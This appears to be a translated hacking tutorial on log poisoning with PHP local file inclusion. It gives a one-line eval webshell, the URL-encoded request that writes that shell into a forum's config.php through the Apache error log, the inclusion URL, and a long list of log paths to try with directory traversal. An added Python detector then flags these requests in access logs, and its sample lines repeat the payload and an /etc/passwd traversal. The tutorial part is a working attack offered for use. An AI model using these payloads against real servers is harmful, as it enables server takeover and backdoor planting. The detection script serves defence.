Because the approach above is very impractical (in testing I found the log quickly grows to tens of megabytes, which takes all the fun out of it), let's think one step further: we write an actual webshell file to use, which is far better than the painfully slow method above.

For example, again this one-line trojan:
<?eval($_POST[cmd]);?>

By now you may have thought of it: this is a pretty good method. Read on, because how to write the file becomes the question. Use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then the one-line trojan server-side statement <?eval($_POST[cmd]);?> is written into it. Joined together as a PHP statement, that is
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> // writes the one-line trojan statement into config.php

We submit this statement, have Apache record it in the error log, then include the log, and the shell is written. Remember that it must be URL-encoded or it will not work.
Encoded, it becomes
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now records this line of webshell-writing code.
Now we include the log again; submit
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
With that the webshell is written successfully: config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it with lanker's client and the host is yours.

PS: Everything above presupposes that the directory permissions are writable; it has to be -rwxrwxrwx (777) to proceed, which you check directly from the directory listing given above. Everything above is exploitation for the case where the log path is already known.
For other log paths you can guess, or refer to the list here:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
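As an added example (not part of the original post), here is detection logic a defender can run over Apache access-log lines to catch both steps described above: a request whose URI carries PHP code (the poisoning step, caught even when URL-encoded once or twice) and a request whose parameter names one of the log locations in the list above (the inclusion step). The log lines are constructed samples in the combined log format, and the parameter name zizzy is taken from the post.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')  # request line of the combined log format
# last directory plus file name of the log locations listed above (access_log, acces.log, www-error_log ...)
LOG_PATH_RE = re.compile(r"/(?:log|logs|httpd|apache)/[\w.-]*(?:access|acces|error)[._]log\b", re.I)
PHP_MARKERS = ("<?", "eval(", "fopen(", "fputs(", "$_post[", "$_get[")  # fragments of a payload bound for the log

def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%253C%253F) are seen too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line):
    """Return the set of findings for one access-log line (empty set if clean)."""
    m = REQ_RE.search(line)
    if not m:
        return set()
    uri = fully_decode(m.group(1))
    findings = set()
    if any(marker in uri.lower() for marker in PHP_MARKERS):
        findings.add("php-in-uri")        # poisoning step: PHP code is about to land in the log
    for _, value in parse_qsl(urlsplit(uri).query):
        if LOG_PATH_RE.search(value):
            findings.add("log-inclusion")  # inclusion step: a parameter names a log file
        elif "../" in value:
            findings.add("traversal")      # traversal aimed at some other file
    return findings

def scan(lines):
    out = []                               # [(line_number, findings)] for every flagged line
    for n, line in enumerate(lines, 1):
        findings = classify(line)
        if findings:
            out.append((n, findings))
    return out

# constructed sample lines, not real traffic; the parameter name zizzy is taken from the post
SAMPLE_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 209',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /z.php?zizzy=../../../../var/log/apache/error_log HTTP/1.1" 200 3410',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /z.php?zizzy=/var/www/logs/access.log HTTP/1.1" 200 8800',
    '10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /z.php?zizzy=../../etc/passwd HTTP/1.1" 200 1700',
]
```

Running scan(SAMPLE_LINES) flags lines 2 to 5 and leaves the ordinary request alone; a "php-in-uri" hit followed shortly by a "log-inclusion" hit from the same client is the sequence this post describes.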